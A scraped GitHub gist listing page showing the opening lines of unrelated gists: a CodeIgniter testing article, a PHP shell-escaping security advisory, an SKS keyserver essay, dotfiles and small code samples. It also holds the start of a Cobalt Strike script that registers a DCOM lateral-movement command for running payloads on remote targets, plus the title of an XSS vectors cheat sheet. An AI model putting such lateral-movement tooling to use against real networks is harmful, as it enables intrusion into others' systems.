🇨🇦
Use AGPL

Sean AlbinoDrought

@samkeen
samkeen / TestingCodeigniter.md
Created Aug 12, 2011
Article describing how to test Codeigniter apps
View TestingCodeigniter.md

(Integration) Test Infecting Codeigniter

Intro

This is not an article on the theoretical proper way to implement a testing policy and/or infrastructure. This is much more real-world than that. This is about finding yourself in a situation where you need to refactor or add features to an existing substantial code base. Before undertaking such an adventure you would like to lay down some tests for regression purposes. The hitch is that the code is in a framework that hasn't put testing support first.

Many PHP frameworks qualify for the statement above, but the one we will talk about in this article is Codeigniter. I won't use this article to debate the quality of the Codeigniter code base. It is what it is, and it is used for a great many websites in production. What this article is about is addressing the situation that many developers out there may find themselves working on a product utilizing a framework such as Codeigniter

@Zenexer
Zenexer / escapeshellrce.md
Last active Mar 15, 2021
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
View escapeshellrce.md

Paul Buonopane paul@namepros.com at NamePros
PGP: https://keybase.io/zenexer

I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.

This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities.

This advisory does not yet have associated CVE identifiers.

Summary

@rsmudge
rsmudge / comexec.cna
Created Jan 6, 2017
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
View comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
	"Synopsis: com-exec [target] [listener]\n\n" .
	"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View AudioManager.cs
using System;
using System.Runtime.InteropServices;
// ReSharper disable SuspiciousTypeConversion.Global
// ReSharper disable InconsistentNaming
namespace AudioController
{
    /// <summary>
    /// Controls audio using the Windows CoreAudio API
    /// from: http://stackoverflow.com/questions/14306048/controling-volume-mixer
@kurobeats
kurobeats / xss_vectors.txt
Last active Aug 11, 2022
XSS Vectors Cheat Sheet
View xss_vectors.txt
@AlbinoDrought
AlbinoDrought / .tigrc
Last active Oct 9, 2018
My basic af .tigrc
View .tigrc
# Press ctrl+a to amend the last commit with whatever is staged
bind status <Ctrl-A> !git commit --amend
# Press shift+p to push
# requires `git config --global push.default current`
bind status P !git push -u
@AlbinoDrought
AlbinoDrought / creamy-things-to-make.md
Last active Mar 22, 2022
Creamy Things To Make ™️
View creamy-things-to-make.md

Creamy Things

  • SkipTheDishes tracker (No longer used)
  • 🎊 Some ghetto NextCloud clone that I feel safe selfhosting (probably read only) (video version here, working and in use) (file version WIP)
  • yet another IRC client for the 21st century
  • selfhosted screensharing thing (like rabb.it, but not) alternative exists: https://github.com/m1k1o/neko
  • a modern browser that isn't rounded
  • some way to import normal cams to unify Unifi Video is losing support, moving to something like Shinobi instead (ctrl-f NVR)
  • foss modern feedback tracker thing (can io)
  • visual dice rolling bot to make hard life choices for me
@rjhansen
rjhansen / keyservers.md
Last active Aug 11, 2022
SKS Keyserver Network Under Attack
View keyservers.md

SKS Keyserver Network Under Attack

This work is released under a Creative Commons Attribution-NoDerivatives 4.0 International License.

Terminological Note

"OpenPGP" refers to the OpenPGP protocol, in much the same way that HTML refers to the protocol that specifies how to write a web page. "GnuPG", "SequoiaPGP", "OpenPGP.js", and others are implementations of the OpenPGP protocol in the same way that Mozilla Firefox, Google Chromium, and Microsoft Edge refer to software packages that process HTML data.

Who am I?

View basic-tcp-chat.zig
const std = @import("std");
const net = std.net;
const fs = std.fs;
const os = std.os;
pub const io_mode = .evented;
pub fn main() anyerror!void {
    var general_purpose_allocator = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = &general_purpose_allocator.allocator;